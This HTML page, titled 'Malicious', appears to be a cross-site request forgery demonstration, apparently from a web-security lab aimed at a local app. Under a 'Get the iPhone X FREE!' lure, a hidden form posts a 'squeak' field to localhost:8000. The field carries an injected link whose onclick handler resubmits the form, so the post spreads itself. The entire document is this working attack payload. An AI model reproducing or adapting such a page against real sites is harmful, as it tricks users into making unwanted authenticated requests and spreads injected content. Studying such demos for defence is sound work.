<!doctype html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">


    <title>Malicious</title>
</head>
<body>


<div class="container">

    <div class="row mt-5 offset-4 col-8">
        <h2>Get the iPhone X FREE!</h2>
    </div>

    <form class="mt-2" action="http://localhost:8000/home" method="POST">
        <input
            type="hidden"
            name="squeak"
            class="form-control"
            id="squeak"
            value='Click <a href="http://localhost:3000" onclick="this.parentNode.submit()">here</a> to get the iPhone X Free!'
        />


        <div class="form-group offset-4 row">
            <div class="col-8">
                <button type="submit" class="btn btn-primary">Review Now!</button>
            </div>

        </div>
    </form>

</div>


<!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="js/jquery-3.3.1.min.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/bootstrap.min.js"></script>

</body>
</html>
